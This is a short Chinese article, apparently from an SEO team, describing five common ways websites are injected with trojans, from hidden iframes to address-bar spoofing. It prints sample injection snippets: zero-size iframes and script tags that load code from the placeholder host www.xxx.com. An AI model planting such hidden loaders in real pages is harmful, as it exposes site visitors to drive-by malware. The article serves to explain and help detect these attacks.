前段時間公司優化項目中出現了幾個網站被掛馬的情況，所以SEO研究院就針對于掛馬進行了研究，網站掛馬常見的幾種代碼類型如下：

1、框架嵌入式網頁掛馬

框架嵌入式網頁掛馬是最早也是早有效的一種網絡掛馬技術，它是掛馬者利用iframe語句，加載到任意網頁中都可執行的掛馬形式。通常的代碼形式如下：

<iframe src=http://www.xxx.com/muma.html width=0 height=0></iframe>

在打開插入該句代碼的網頁后，同時也就打開了http://www.xxx.com/muma.html這個頁面，但是由于這個頁面的長和寬都是“0”，所以很難被察覺到，極其隱蔽。

2、JS調用型網頁掛馬

JS調用型網頁掛馬是利用JS腳本文件調用的原理進行的網頁木馬隱蔽掛馬技術，例如黑客制作了一個.JS的文件，然后就利用這個JS代碼調用掛馬的網頁。通常的代碼形式如下：

<script language=javascript src=http://www.xxx.com/gm.js></script>

http://www.xxx.com/gm.js這就是JS的腳本文件，通過它可以調用和執行木馬的服務端。這些JS文件一般都是可以通過工具生成的，黑客只需要輸入相關的選項就可以了。

3、圖片偽裝掛馬

黑客們為了逃避殺毒監視就生產了一種新的技術――圖片木馬，如下面的這段代碼

<html>

<iframe src="http://www.xxx.com/test.htm" height=0 width=0></iframe>

<img src="http://www.xxx.com/test.jpg">

</html>

攻擊者將http://www.xxx.com/test.htm中的木馬代碼植入到了test.jpg圖片文件中，這些嵌入代碼的圖片也都可以使用工具生成，黑客們只需要輸入相關的選項就可以了。

4、網絡釣魚掛馬

網絡釣魚掛馬又稱偽裝調用掛馬，是互聯網中最常見的一種欺騙手段。它是黑客利用人們的好奇心、貪心等心理制作的一個偽裝鏈接或網頁。它利用社會工程學的欺騙方法，引誘用戶點擊，當用戶打開一個看似正常的頁面時，網頁代碼隨之運行。

這種方式的隱蔽性極高，它往往是欺騙用戶輸入某些個人隱私信息，竊取個人隱私。如下圖就是一個網絡釣魚網站，表面看起來沒有異常，但是你看域名就會發現問題了。

5、偽裝掛馬

這是一種高級的欺騙掛馬，是黑客利用IE或者是Fixfox瀏覽器的設計缺陷制造的一種高級欺騙技術，當用戶訪問木馬頁面時地址欄的是www.sina.com等用戶信任的地址，但是其實打開了被掛馬的頁面，從而實現欺騙。